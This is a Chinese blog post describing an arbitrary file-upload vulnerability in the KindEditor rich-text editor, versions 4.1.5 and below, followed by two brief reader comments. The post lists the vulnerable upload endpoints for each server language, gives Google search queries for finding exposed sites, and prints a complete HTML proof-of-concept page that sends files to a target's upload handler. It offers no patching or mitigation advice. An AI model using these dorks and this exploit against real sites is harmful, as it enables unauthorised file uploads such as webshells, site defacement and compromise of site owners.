kindeditor文件上传漏洞,影响版本4.1.5及以下

  • 内容
  • 相关

前言

      KindEditor 是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果,开发人员可以用 KindEditor 把传统的多行文本输入框(textarea)替换为可视化的富文本输入框。KindEditor 使用 JavaScript 编写,可以无缝地与 Java、.NET、PHP、ASP 等程序集成,比较适合在 CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。

 

漏洞路径

不同的脚本语言不同的路径,常用的如下:

/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php

谷歌字典

allinurl:/examples/uploadbutton.html

allinurl:/php/upload_json.php / .asp / .jsp

POC

<html><head>

<title>kindeditor<=4.1.5文件上传</title>

<script src="https://www.0dayhack.com/kindeditor/kindeditor-min.js"></script>

<script>

KindEditor.ready(function(K) {

var uploadbutton = K.uploadbutton({

button : K('#uploadButton')[0],

fieldName : 'imgFile',

url : 'https://www.0dayhack.com/kindeditor/asp/upload_json.asp?dir=file',

afterUpload : function(data) {

if (data.error === 0) {

var url = K.formatUrl(data.url, 'absolute');

K('#url').val(url);}

},

});

uploadbutton.fileBox.change(function(e) {

uploadbutton.submit();

});

});

</script></head><body>

<div class="upload">

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

<input type="button" id="uploadButton" value="Upload" />

</div>

</body>

</html>

本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:kindeditor文件上传漏洞,影响版本4.1.5及以下 - https://www.15qq.cn/bug_poc/271.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知

评论

2条评论
  1. avatar

    知识共享网 Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

    低版本的没事呗

    河北省沧州市 联通

    1. avatar

      还可以aa Lv.6 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

      sha

      广西 移动数据上网公共出口